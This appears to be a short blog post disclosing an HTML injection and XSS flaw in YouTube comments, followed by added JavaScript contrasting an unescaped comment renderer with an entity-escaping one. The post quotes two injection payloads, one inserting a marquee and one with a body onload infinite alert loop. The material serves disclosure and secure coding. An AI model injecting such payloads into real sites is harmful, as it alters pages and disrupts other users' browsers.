I just wrote a mail to the Google security team, but I'm sure they're aware of it already anyway. I was telling them about an HTML injection attack on YouTube that's going on. Apparently comments aren't properly escaped, so this will actually put a marquee on the page:
<script>IF_HTML_FUNCTION?<marquee><b>Woot!<script>
Supposedly, this XSS attack works too, but I couldn't confirm it:
<script>IF_HTML_FUNCTION?<body onload="while(1){ alert('Woot!'); }"><script>
Edit: Reddit has a good discussion on it.
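As an added example (not from the original post and not YouTube's code), here is a minimal comment renderer that concatenates raw text, which lets the first payload quoted above become live markup, next to the hardened form that entity-escapes the comment before concatenation. The function names and the wrapper element are assumptions.

```javascript
// Added example: escaping user comments before embedding them in HTML
// (constructed code; function names and wrapper markup are assumptions).
const HTML_ESCAPES = {
  '&': '&amp;',
  '<': '&lt;',
  '>': '&gt;',
  '"': '&quot;',
  "'": '&#39;',
};

// Replace every character with meaning in HTML text or attribute context
// by its entity, so the browser treats the comment as literal text.
function escapeHtml(text) {
  return String(text).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// Vulnerable form: the comment is dropped straight into the markup,
// so any tag inside it becomes part of the page.
function renderCommentUnsafe(comment) {
  return `<div class="comment">${comment}</div>`;
}

// Hardened form: the comment is escaped before concatenation.
function renderCommentSafe(comment) {
  return `<div class="comment">${escapeHtml(comment)}</div>`;
}

// Check helper: true if the rendered HTML contains any tag other than
// the wrapper element the renderer emitted itself.
function leaksMarkup(html) {
  const inner = html
    .replace(/^<div class="comment">/, '')
    .replace(/<\/div>$/, '');
  return /<[a-zA-Z!\/]/.test(inner);
}

// Constructed sample input: the marquee payload quoted in the post.
const SAMPLE = '<script>IF_HTML_FUNCTION?<marquee><b>Woot!<script>';

console.log('unsafe:', renderCommentUnsafe(SAMPLE));
console.log('safe:  ', renderCommentSafe(SAMPLE));
```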